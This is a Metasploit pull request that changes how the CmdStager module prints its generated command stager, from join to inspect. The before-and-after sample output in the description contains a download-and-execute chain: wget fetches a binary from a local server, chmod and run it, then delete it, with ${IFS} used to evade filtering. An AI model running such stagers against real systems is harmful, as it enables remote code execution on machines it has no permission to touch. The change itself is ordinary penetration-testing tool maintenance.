### PR TITLE
Print generated CmdStager with inspect, not join

### DIFF
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -137,7 +137,7 @@ module Exploit::CmdStager
       raise ArgumentError, 'The command stager could not be generated'
     end
 
-    vprint_status("Generated command stager: #{cmd_list.join}")
+    vprint_status("Generated command stager: #{cmd_list.inspect}")
 
     cmd_list
   end


### PR DESCRIPTION
I dun goofed. I knew I should have just printed it verbatim.

tl;dr I thought I had accounted for command compression. I was wrong. This should also give us more information about what exactly is being run and how many times.

Before:

```
[*] Generated command stager: wget${IFS}-qO${IFS}/tmp/mzvkhpgr${IFS}http://127.0.0.1:8080/kezparajchmod${IFS}+x${IFS}/tmp/mzvkhpgr;/tmp/mzvkhpgrrm${IFS}-f${IFS}/tmp/mzvkhpgr
```

After:

```
[*] Generated command stager: ["wget${IFS}-qO${IFS}/tmp/lzuzlyaw${IFS}http://127.0.0.1:8080/lxjxmksh", "chmod${IFS}+x${IFS}/tmp/lzuzlyaw;/tmp/lzuzlyaw", "rm${IFS}-f${IFS}/tmp/lzuzlyaw"]
```

Fixes #9253.